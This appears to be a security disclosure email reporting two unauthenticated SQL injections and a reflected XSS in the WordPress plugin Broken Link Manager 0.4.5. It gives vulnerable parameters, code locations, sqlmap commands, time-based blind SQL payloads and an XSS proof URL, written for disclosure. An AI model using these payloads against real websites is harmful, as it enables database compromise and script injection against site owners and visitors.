Hello,

Plugin: broken link manager 0.4.5.

Unauthenticated remote attackers can execute arbitrary SQL commands and inject malicious javascript.

1. SQL injection (wpslDelURL() function)

Method: GET

Vulnerable parameter: url [/broken-link-manager/config/functions.php:73]

PHP callstack:

wpslDelURL [/broken-link-manager/config/functions.php:77]

wpdb::query

Sqlmap verification:

sqlmap --dbms mysql -u "http://localhost/?delURL=1&url=x" -p url

...

Parameter: url (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: delURL=1&url=x AND (SELECT * FROM (SELECT(SLEEP(5)))UCNT)

...

2. SQL injection (wpslEditURL() function)

Method: POST

Vulnerable parameter: url [/broken-link-manager/config/functions.php:39]

wpslEditURL [/broken-link-manager/config/functions.php:46]

fake_wpdb::query

Sqlmap verification:

sqlmap -r wpsl_edit_url_request.txt --dbms mysql -p url

...

Parameter: url (POST)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: type=x&url=1 AND (SELECT * FROM (SELECT(SLEEP(5)))fCpJ)

...

wpsl_edit_url_request.txt file attached

3. Reflected XSS

Method: GET

Vulnerable parameter: page [/broken-link-manager/config/functions.php:74]

Verification: http://localhost/?delURL=1&url=x&page="; alert(%27XSS%27);%20var%20d=%22

Regards,
Marcin Probola,